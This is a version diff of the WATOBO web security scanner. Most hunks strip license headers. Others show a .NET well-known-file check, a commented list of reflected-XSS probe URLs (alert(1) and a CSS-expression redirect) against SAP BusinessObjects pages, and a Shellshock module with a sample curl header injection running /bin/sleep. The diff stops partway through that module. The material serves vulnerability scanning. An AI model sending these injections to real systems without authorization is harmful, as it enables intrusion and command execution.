watobo 0.9.21 → 0.9.23

data/modules/active/dotNET/dotnet_files.rb

@@ -1,100 +1,91 @@
-#.
-# dotnet_files.rb
-#.
-# Copyright 2014 by siberas, http://www.siberas.de
-# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
-# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
-# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
-# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-
 # @private 
-module Watobo#:nodoc: all
-  module Modules
-    module Active
-      module Dotnet
-        
-        #class Dir_indexing < Watobo::Mixin::Session
-        class Dotnet_files < Watobo::ActiveCheck
-          @@tested_directories = Hash.new
-          
-           @info.update(
-                         :check_name => '.NET Files',    # name of check which briefly describes functionality, will be used for tree and progress views
-            :description => "This module checks your application for well known files, e.g. trace.axd.",   # description of checkfunction
-            :author => "Andreas Schmidt", # author of check
-            :version => "1.0",   # check version
-            :check_group => ".NET"
-            )
-            
-             @finding.update(
-                            :threat => 'Information Disclosure.',        # thread of vulnerability, e.g. loss of information
-            :class => ".NET: Well-Known Files",    # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
-            :type => FINDING_TYPE_VULN,         # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
-             :rating => VULN_RATING_INFO 
-            )
-            
-          def initialize(project, prefs={})
-            super(project, prefs)
-            
-            @wnfs = []
-            @wnfs << { :name => "Trace.axd", :pattern => "Trace\.axd.clear=1" }
-            @wnfs << { :name => "elmah.axd", :pattern => "Error log for" }
-            
-            
-          end
-          
-          def reset()
-            @@tested_directories.clear
-          end
-          
-          def generateChecks(chat)
-            
-            begin
-              path = chat.request.dir
-              if !@@tested_directories.has_key?(path) then
-                @@tested_directories[path] = true
-                @wnfs.each do |wnf|
-                checker = proc {
-                  begin
-                      test_request = nil
-                      test_response = nil
-                     
-                      test = chat.copyRequest
-                 
-                      test.replaceFileExt(wnf[:name])
-                       status, test_request, test_response = fileExists?(test)
-                 
-                
-                if status == true and test_response.has_body?
-                  if test_response.body =~ /#{wnf[:pattern]}/
-                    addFinding(  test_request, test_response,
-                      :test_item => "#{wnf[:name]}",
-                      :proof_pattern => "#{wnf[:pattern]}",
-                      :check_pattern => "#{Regexp.quote(wnf[:name])}",
-                      :chat => chat,
-                      :threat => "depends on the file ;)",
-                      :title => "[#{wnf[:name]}]"
-                      )
-                  end
-                  
-                end
-                  rescue => bang
-                    puts bang
-                    puts bang.backtrace if $DEBUG
-                  end
-                 [ test_request, test_response ]
-                  
-                }
-                yield checker
-              end
-              end
-            rescue => bang
-              puts "!error in module #{Module.nesting[0].name}"
-              puts bang
-            end
-          end
-          
-        end
-      end
-    end  
-  end
-end
+module Watobo#:nodoc: all
+  module Modules
+    module Active
+      module Dotnet
+        
+        #class Dir_indexing < Watobo::Mixin::Session
+        class Dotnet_files < Watobo::ActiveCheck
+          @@tested_directories = Hash.new
+          
+           @info.update(
+                         :check_name => '.NET Files',    # name of check which briefly describes functionality, will be used for tree and progress views
+            :description => "This module checks your application for well known files, e.g. trace.axd.",   # description of checkfunction
+            :author => "Andreas Schmidt", # author of check
+            :version => "1.0",   # check version
+            :check_group => ".NET"
+            )
+            
+             @finding.update(
+                            :threat => 'Information Disclosure.',        # thread of vulnerability, e.g. loss of information
+            :class => ".NET: Well-Known Files",    # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
+            :type => FINDING_TYPE_VULN,         # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
+             :rating => VULN_RATING_INFO 
+            )
+            
+          def initialize(project, prefs={})
+            super(project, prefs)
+            
+            @wnfs = []
+            @wnfs << { :name => "Trace.axd", :pattern => "Trace\.axd.clear=1" }
+            @wnfs << { :name => "elmah.axd", :pattern => "Error log for" }
+            
+            
+          end
+          
+          def reset()
+            @@tested_directories.clear
+          end
+          
+          def generateChecks(chat)
+            
+            begin
+              path = chat.request.dir
+              if !@@tested_directories.has_key?(path) then
+                @@tested_directories[path] = true
+                @wnfs.each do |wnf|
+                checker = proc {
+                  begin
+                      test_request = nil
+                      test_response = nil
+                     
+                      test = chat.copyRequest
+                 
+                      test.replaceFileExt(wnf[:name])
+                       status, test_request, test_response = fileExists?(test)
+                 
+                
+                if status == true and test_response.has_body?
+                  if test_response.body =~ /#{wnf[:pattern]}/
+                    addFinding(  test_request, test_response,
+                      :test_item => "#{wnf[:name]}",
+                      :proof_pattern => "#{wnf[:pattern]}",
+                      :check_pattern => "#{Regexp.quote(wnf[:name])}",
+                      :chat => chat,
+                      :threat => "depends on the file ;)",
+                      :title => "[#{wnf[:name]}]"
+                      )
+                  end
+                  
+                end
+                  rescue => bang
+                    puts bang
+                    puts bang.backtrace if $DEBUG
+                  end
+                 [ test_request, test_response ]
+                  
+                }
+                yield checker
+              end
+              end
+            rescue => bang
+              puts "!error in module #{Module.nesting[0].name}"
+              puts bang
+            end
+          end
+          
+        end
+      end
+    end  
+  end
+end

data/modules/active/fileinclusion/lfi_simple.rb

@@ -1,12 +1,3 @@
-#.
-# lfi_simple.rb
-#.
-# Copyright 2014 by siberas, http://www.siberas.de
-# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
-# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
-# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
-# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-
 require 'digest/md5'
 require 'digest/sha1'
 

data/modules/active/jboss/jboss_basic.rb

@@ -1,12 +1,3 @@
-#.
-# jboss_basic.rb
-#.
-# Copyright 2014 by siberas, http://www.siberas.de
-# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
-# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
-# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
-# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-
 # @private 
 module Watobo#:nodoc: all
   module Modules

data/modules/active/sap/business_objects.rb

@@ -1,63 +1,54 @@
-#.
-# business_objects.rb
-#.
-# Copyright 2014 by siberas, http://www.siberas.de
-# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
-# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
-# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
-# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+=begin
+http://www.example.com:8080/AdminTools/querybuilder/ie.jsp?ADD_RULE=1&AND_BTN=1&ATTRIBUTES_LIST=1&ATTRIBUTES_NOTES=1&ATTRIBUTES_PROMPT=1&BUILD_SQL_HEADER=1&BUILD_SQL_INSTRUCTION=1&EXIT=1&FINISH=1&FINISH_BTN=1&FINISH_HEADER=1&IETIPS=1&MUST_ANDOR_CLAUSES=1&MUST_SELECT_CLAUSES=1&NO_CLAUSES=1&NO_RULES=1&OR=1&OR_BTN=1&OTHER_RULE_HEADER=1&REMOVE=1&REMOVE_RULE_HEADER=1&RESET=1&RULE_HEADER=1&SELECT_SUBTITLE1=mr&SELECT_SUBTITLE2=mr&SELECT_SUBTITLE3=mr&SELECT_SUBTITLE4=mr&SPECIFY_ATTRIBUTES_PROMPT=1&SUBMIT=1&TITLE=mr&WELCOME_USER=1&framework=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com:8080/AdminTools/querybuilder/logonform.jsp?APSNAME=Procheckup&AUTHENTICATION=1&LOGON=1&LOG_ON=1&NOTRECOGNIZED=1&PASSWORD=Pcu12U4&REENTER=1&TITLE=mr&UNSURE=1&USERNAME=Procheckup&WELCOME_LOGON=1&action=1&framework="><script>alert(1)</script>
+http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/apply.jsp?WOMdoc=1&WOMqueryAtt=1&WOMquerycontexts=1&WOMqueryfilters=1&WOMqueryobjs=1&WOMunit=1&bodySel=1&capSel=1&colSel=1&compactSteps=1&currReportIdx=1&defaultName=Procheckup&docid=1&doctoken=1&dummy=1&isModified=1&lang="></script><script>alert(1)</script>&lastFormatZone=1&lastOptionZone=1&lastStepIndex=1&mode=1&rowSel=1&sectionSel=1&skin=1&topURL=1&unvid=1&viewType=1&xSel=1&ySel=1&zSel=1&
+http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/apply.jsp?lang=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&
+http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/query.jsp?contexts=1&docid=1&doctoken=1&dummy=1&lang="></script><script>alert(1)</script>
+http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/query.jsp?lang="></script><script>alert(1)</script>
+http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/query.jsp?contexts=1&docid=1&doctoken=1&dummy=1&lang=1&mode=1&queryobjs=1&resetcontexts=1&scope=1&skin="></script><script>alert(1)</script>&unvid=1&
+http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/query.jsp?skin="></script><script>alert(1)</script>
+http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/turnto.jsp?WOMblock=1&WOMqueryAtt=1&WOMqueryfilters=1&WOMqueryobjs=1&WOMturnTo=1&WOMunit=1&doctoken=1&dummy=1&lang="></script><script>alert(1)</script>&skin=1&unit=1&
+http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/turnto.jsp?lang="></script><script>alert(1)</script>
+http://www.example.com:8080/CrystalReports/jsp/CrystalReport_View/viewReport.jsp?loc=//-->"></script><script>alert(1)</script>
+http://www.example.com:8080/InfoViewApp/jsp/common/actionNavFrame.jsp?url="></script><script>alert(1)</script>
+http://www.example.com:8080/PerformanceManagement/scripts/docLoadUrl.jsp?url=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com:6405/PerformanceManagement/scripts/docLoadUrl.jsp?url=�></script><script>alert(1)</script>
+http://www.example.com:8080/PerformanceManagement/jsp/aa-display-flash.jsp?swf="><html><body><script>alert(1)</script>
+http://www.example.com:8080/PerformanceManagement/jsp/alertcontrol.jsp?serSes=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com:6405/PerformanceManagement/jsp/alertcontrol.jsp?serSes=�><script>alert(1)</script>
+http://www.example.com:8080/PerformanceManagement/jsp/viewError.jsp?error=<script>alert(1)</script>
+http://www.example.com:6405/PerformanceManagement/jsp/viewError.jsp?error=<script>alert(1)</script>
+http://www.example.com:8080/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?actcontent=1&actiontype=1&actual=1&anlimage=1&columns=1&flowid="<~/XSS/*-*/STYLE=xss:e/**/xpression (location='http://www.procheckup.com')>&flowname=Procheckup&gacid=1&list=1&listname=Procheckup&listonly=1&progstatus=1&progtrend=1&progtrendImage=1&target=http://www.procheckup.com&uid=1&variance=1&viewed=1&
+http://www.example.com:6405/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?flowid=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&flowname=Procheckup&progtrend=1&viewed=1&
+http://www.example.com:8080/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?actcontent=1&actiontype=1&actual=1&anlimage=1&columns=1&flowid="><script>alert(1)</script>&flowname=Procheckup&gacid=1&list=1&listname=Procheckup&listonly=1&progstatus=1&progtrend=1&progtrendImage=1&target=1&uid=1&variance=1&viewed=1&
+http://www.example.com:6405//PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?&flowid="><script>alert(1)</script>&flowname=Procheckup&gacid=1&progtrend=1&progtrendImage=1&viewed=1&
+http://www.example.com:8080/PerformanceManagement/jsp/sb/roleframe.jsp?rid="<~/XSS/*-*/STYLE=xss:e/**/xpression(location='http://www.procheckup.com')>
+http://www.example.com:6405//PerformanceManagement/jsp/sb/roleframe.jsp?rid="<~/XSS/*-
+http://www.example.com:8080/PerformanceManagement/jsp/viewWebiReportHeader.jsp?sEntry=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com:6405/PerformanceManagement/jsp/viewWebiReportHeader.jsp?sEntry=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com:8080/PerformanceManagement/jsp/wait-frameset.jsp?dummyParam="</script><script>alert(1)</script>
+http://www.example.com:6405/PerformanceManagement/jsp/wait-frameset.jsp?dummyParam="</script><script>alert(1)</script>
+http://www.example.com:8080/PlatformServices/preferences.do?cafWebSesInit=true&service=<SCRIPT>alert(1)</SCRIPT>&actId=541&appKind=CMC  
+=end
 
-=begin
-http://www.example.com:8080/AdminTools/querybuilder/ie.jsp?ADD_RULE=1&AND_BTN=1&ATTRIBUTES_LIST=1&ATTRIBUTES_NOTES=1&ATTRIBUTES_PROMPT=1&BUILD_SQL_HEADER=1&BUILD_SQL_INSTRUCTION=1&EXIT=1&FINISH=1&FINISH_BTN=1&FINISH_HEADER=1&IETIPS=1&MUST_ANDOR_CLAUSES=1&MUST_SELECT_CLAUSES=1&NO_CLAUSES=1&NO_RULES=1&OR=1&OR_BTN=1&OTHER_RULE_HEADER=1&REMOVE=1&REMOVE_RULE_HEADER=1&RESET=1&RULE_HEADER=1&SELECT_SUBTITLE1=mr&SELECT_SUBTITLE2=mr&SELECT_SUBTITLE3=mr&SELECT_SUBTITLE4=mr&SPECIFY_ATTRIBUTES_PROMPT=1&SUBMIT=1&TITLE=mr&WELCOME_USER=1&framework=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
-http://www.example.com:8080/AdminTools/querybuilder/logonform.jsp?APSNAME=Procheckup&AUTHENTICATION=1&LOGON=1&LOG_ON=1&NOTRECOGNIZED=1&PASSWORD=Pcu12U4&REENTER=1&TITLE=mr&UNSURE=1&USERNAME=Procheckup&WELCOME_LOGON=1&action=1&framework="><script>alert(1)</script>
-http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/apply.jsp?WOMdoc=1&WOMqueryAtt=1&WOMquerycontexts=1&WOMqueryfilters=1&WOMqueryobjs=1&WOMunit=1&bodySel=1&capSel=1&colSel=1&compactSteps=1&currReportIdx=1&defaultName=Procheckup&docid=1&doctoken=1&dummy=1&isModified=1&lang="></script><script>alert(1)</script>&lastFormatZone=1&lastOptionZone=1&lastStepIndex=1&mode=1&rowSel=1&sectionSel=1&skin=1&topURL=1&unvid=1&viewType=1&xSel=1&ySel=1&zSel=1&
-http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/apply.jsp?lang=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&
-http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/query.jsp?contexts=1&docid=1&doctoken=1&dummy=1&lang="></script><script>alert(1)</script>
-http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/query.jsp?lang="></script><script>alert(1)</script>
-http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/query.jsp?contexts=1&docid=1&doctoken=1&dummy=1&lang=1&mode=1&queryobjs=1&resetcontexts=1&scope=1&skin="></script><script>alert(1)</script>&unvid=1&
-http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/query.jsp?skin="></script><script>alert(1)</script>
-http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/turnto.jsp?WOMblock=1&WOMqueryAtt=1&WOMqueryfilters=1&WOMqueryobjs=1&WOMturnTo=1&WOMunit=1&doctoken=1&dummy=1&lang="></script><script>alert(1)</script>&skin=1&unit=1&
-http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/turnto.jsp?lang="></script><script>alert(1)</script>
-http://www.example.com:8080/CrystalReports/jsp/CrystalReport_View/viewReport.jsp?loc=//-->"></script><script>alert(1)</script>
-http://www.example.com:8080/InfoViewApp/jsp/common/actionNavFrame.jsp?url="></script><script>alert(1)</script>
-http://www.example.com:8080/PerformanceManagement/scripts/docLoadUrl.jsp?url=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
-http://www.example.com:6405/PerformanceManagement/scripts/docLoadUrl.jsp?url=�></script><script>alert(1)</script>
-http://www.example.com:8080/PerformanceManagement/jsp/aa-display-flash.jsp?swf="><html><body><script>alert(1)</script>
-http://www.example.com:8080/PerformanceManagement/jsp/alertcontrol.jsp?serSes=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
-http://www.example.com:6405/PerformanceManagement/jsp/alertcontrol.jsp?serSes=�><script>alert(1)</script>
-http://www.example.com:8080/PerformanceManagement/jsp/viewError.jsp?error=<script>alert(1)</script>
-http://www.example.com:6405/PerformanceManagement/jsp/viewError.jsp?error=<script>alert(1)</script>
-http://www.example.com:8080/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?actcontent=1&actiontype=1&actual=1&anlimage=1&columns=1&flowid="<~/XSS/*-*/STYLE=xss:e/**/xpression (location='http://www.procheckup.com')>&flowname=Procheckup&gacid=1&list=1&listname=Procheckup&listonly=1&progstatus=1&progtrend=1&progtrendImage=1&target=http://www.procheckup.com&uid=1&variance=1&viewed=1&
-http://www.example.com:6405/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?flowid=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&flowname=Procheckup&progtrend=1&viewed=1&
-http://www.example.com:8080/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?actcontent=1&actiontype=1&actual=1&anlimage=1&columns=1&flowid="><script>alert(1)</script>&flowname=Procheckup&gacid=1&list=1&listname=Procheckup&listonly=1&progstatus=1&progtrend=1&progtrendImage=1&target=1&uid=1&variance=1&viewed=1&
-http://www.example.com:6405//PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?&flowid="><script>alert(1)</script>&flowname=Procheckup&gacid=1&progtrend=1&progtrendImage=1&viewed=1&
-http://www.example.com:8080/PerformanceManagement/jsp/sb/roleframe.jsp?rid="<~/XSS/*-*/STYLE=xss:e/**/xpression(location='http://www.procheckup.com')>
-http://www.example.com:6405//PerformanceManagement/jsp/sb/roleframe.jsp?rid="<~/XSS/*-
-http://www.example.com:8080/PerformanceManagement/jsp/viewWebiReportHeader.jsp?sEntry=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
-http://www.example.com:6405/PerformanceManagement/jsp/viewWebiReportHeader.jsp?sEntry=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
-http://www.example.com:8080/PerformanceManagement/jsp/wait-frameset.jsp?dummyParam="</script><script>alert(1)</script>
-http://www.example.com:6405/PerformanceManagement/jsp/wait-frameset.jsp?dummyParam="</script><script>alert(1)</script>
-http://www.example.com:8080/PlatformServices/preferences.do?cafWebSesInit=true&service=<SCRIPT>alert(1)</SCRIPT>&actId=541&appKind=CMC  
-=end
-
-=begin
+=begin
 # @private 
-module Watobo#:nodoc: all
-  module Modules
-    module Active
-      module Sap
-        
-        
-        class Business_objects < Watobo::ActiveCheck
-          
-          def initialize(project, prefs={})
-           
-            super(project, prefs)
-          end
-        end
-        
-end
-end
-end
-end
+module Watobo#:nodoc: all
+  module Modules
+    module Active
+      module Sap
+        
+        
+        class Business_objects < Watobo::ActiveCheck
+          
+          def initialize(project, prefs={})
+           
+            super(project, prefs)
+          end
+        end
+        
+end
+end
+end
+end
 =end

data/modules/active/sap/its_commands.rb

@@ -1,12 +1,3 @@
-#.
-# its_commands.rb
-#.
-# Copyright 2014 by siberas, http://www.siberas.de
-# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
-# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
-# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
-# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-
 # @private 
 module Watobo#:nodoc: all
   module Modules

data/modules/active/sap/its_service_parameter.rb

@@ -1,12 +1,3 @@
-#.
-# its_service_parameter.rb
-#.
-# Copyright 2014 by siberas, http://www.siberas.de
-# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
-# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
-# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
-# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-
 require 'digest/md5'
 require 'digest/sha1'
 

data/modules/active/sap/its_services.rb

@@ -1,12 +1,3 @@
-#.
-# its_services.rb
-#.
-# Copyright 2014 by siberas, http://www.siberas.de
-# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
-# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
-# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
-# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-
 require 'digest/md5'
 require 'digest/sha1'
 

data/modules/active/sap/its_xss.rb

@@ -1,12 +1,3 @@
-#.
-# its_xss.rb
-#.
-# Copyright 2014 by siberas, http://www.siberas.de
-# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
-# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
-# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
-# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-
 require 'digest/md5'
 require 'digest/sha1'
 

data/modules/active/shell_shock/shell_shock.rb

@@ -1,149 +1,140 @@
-#.
-# shell_shock.rb
-#.
-# Copyright 2014 by siberas, http://www.siberas.de
-# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
-# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
-# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
-# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+=begin
+$ curl -i -H "Negotiate: () { :; }; /bin/sleep 3" http://192.168.70.134/cgi-bin/shock.cgi
+HTTP/1.1 500 Internal Server Error
+Date: Fri, 24 Jan 2014 08:50:10 GMT
+Server: Apache/2.2.22 (Debian)
+Vary: Accept-Encoding
+Content-Length: 619
+Connection: close
+Content-Type: text/html; charset=iso-8859-1
 
-=begin
-$ curl -i -H "Negotiate: () { :; }; /bin/sleep 3" http://192.168.70.134/cgi-bin/shock.cgi
-HTTP/1.1 500 Internal Server Error
-Date: Fri, 24 Jan 2014 08:50:10 GMT
-Server: Apache/2.2.22 (Debian)
-Vary: Accept-Encoding
-Content-Length: 619
-Connection: close
-Content-Type: text/html; charset=iso-8859-1
-
-<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
-<html><head>
-<title>500 Internal Server Error</title>
-</head><body>
-<h1>Internal Server Error</h1>
-<p>The server encountered an internal error or
-misconfiguration and was unable to complete
-your request.</p>
-<p>Please contact the server administrator,
- webmaster@localhost and inform them of the time the error occurred,
-and anything you might have done that may have
-caused the error.</p>
-<p>More information about this error may be available
-in the server error log.</p>
-<hr>
-<address>Apache/2.2.22 (Debian) Server at 192.168.70.134 Port 80</address>
-</body></html>
-  
-=end
-
-module Watobo#:nodoc: all
-  module Modules
-    module Active
-      module Shell_shock
-        
-        
-        class Shell_shock < Watobo::ActiveCheck
-          @info.update(
-                         :check_name => 'ShellShock',    # name of check which briefly describes functionality, will be used for tree and progress views
-            :check_group => AC_GROUP_GENERIC,
-            :description => "",   # description of checkfunction
-            :author => "Andreas Schmidt", # author of check
-            :version => "0.9"   # check version
-            )
-            
-            threat =<<'EOF'
-            Really bad, bad things can happen! 
-EOF
-            
-            measure = "Patch it!"
-            
-            @finding.update(
-                            :threat => threat,        # thread of vulnerability, e.g. loss of information
-                            :class => "ShellShock (RCE)",    # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
-                            :type => FINDING_TYPE_VULN,         # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
-                            :rating => VULN_RATING_CRITICAL,
-                            :measure => measure
-                            )
-            
-            
-          def initialize(project, prefs={})
-            super(project, prefs)
-            
-          end
-          
-          def generateChecks(chat)
-                         
-                checker = proc {
-                   test_request = nil
-                   test_response = nil
-                   output = ""
-                   
-                   rtimes = []
-                     
-                   timing_response = nil
-                      
-                   3.times do
-                        test = chat.copyRequest
-                         start = Time.now().to_i
-                         timing_request, timing_response = doRequest(test,:default => true)
-                         stop = Time.now().to_i
-                         rtimes << ( stop - start )
-                      
-                    end
-                      # now calculate the average time
-                      t_average = rtimes.inject(:+) / rtimes.length
-                      t_average = 1 if t_average == 0
-                      
-                      time_to_sleep = rtimes.max > (2 * t_average) ? rtimes.max : (2 * t_average)
-                      
-                      timeout_counter = 0
-                     t_start = Time.now().to_i
-                   
-                   request = chat.copyRequest
-                   request.addHeader("Negotiate", "() { :;}; /bin/sleep #{time_to_sleep}")
-                   
-                   test_request, test_response = doRequest(request, :default => true)
-                   
-                   t_stop = Time.now.to_i
-                   timeout_counter += 1
-                         
-                   duration = t_stop - t_start
-                   #  puts duration
-                   if ( duration >= time_to_sleep )
-                           puts "Found ShellShock Vulnerablitiy !!!"
-                           puts "after #{duration}s / time-to-sleep #{time_to_sleep}s)"
-                          
-                           test_request.extend Watobo::Mixin::Parser::Url unless test_request.respond_to? :path
-                          
-                           path = "/" + test_request.path
-                          
-                           output << "SleepTime: #{time_to_sleep}\nQuery Duration: #{duration}s" 
-                                                   
-                           addFinding( test_request, test_response,
-                                     :check_pattern => "Negotiate.*sleep \d",
-                                     :chat => chat,
-                                     :title => "[Timing] - #{path}",
-                                     :proof_pattern => "",
-                                     :test_item => "Negotiate",
-                                     :class => "ShellShock (Time-based)",
-                                     :output => output               
-                                     )
-                            #readlines
-                          break 
-                         end
-                        
-                     
-                    [ test_request, test_response ]
-                  }
-                  yield checker
-                  
-                
-             end
-          end
-
-        # --> eo namespace    
-      end
-    end
-  end
-end
+<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
+<html><head>
+<title>500 Internal Server Error</title>
+</head><body>
+<h1>Internal Server Error</h1>
+<p>The server encountered an internal error or
+misconfiguration and was unable to complete
+your request.</p>
+<p>Please contact the server administrator,
+ webmaster@localhost and inform them of the time the error occurred,
+and anything you might have done that may have
+caused the error.</p>
+<p>More information about this error may be available
+in the server error log.</p>
+<hr>
+<address>Apache/2.2.22 (Debian) Server at 192.168.70.134 Port 80</address>
+</body></html>
+  
+=end
+
+module Watobo#:nodoc: all
+  module Modules
+    module Active
+      module Shell_shock
+        
+        
+        class Shell_shock < Watobo::ActiveCheck
+          @info.update(
+                         :check_name => 'ShellShock',    # name of check which briefly describes functionality, will be used for tree and progress views
+            :check_group => AC_GROUP_GENERIC,
+            :description => "",   # description of checkfunction
+            :author => "Andreas Schmidt", # author of check
+            :version => "0.9"   # check version
+            )
+            
+            threat =<<'EOF'
+            Really bad, bad things can happen! 
+EOF
+            
+            measure = "Patch it!"
+            
+            @finding.update(
+                            :threat => threat,        # thread of vulnerability, e.g. loss of information
+                            :class => "ShellShock (RCE)",    # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
+                            :type => FINDING_TYPE_VULN,         # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
+                            :rating => VULN_RATING_CRITICAL,
+                            :measure => measure
+                            )
+            
+            
+          def initialize(project, prefs={})
+            super(project, prefs)
+            
+          end
+          
+          def generateChecks(chat)
+                         
+                checker = proc {
+                   test_request = nil
+                   test_response = nil
+                   output = ""
+                   
+                   rtimes = []
+                     
+                   timing_response = nil
+                      
+                   3.times do
+                        test = chat.copyRequest
+                         start = Time.now().to_i
+                         timing_request, timing_response = doRequest(test,:default => true)
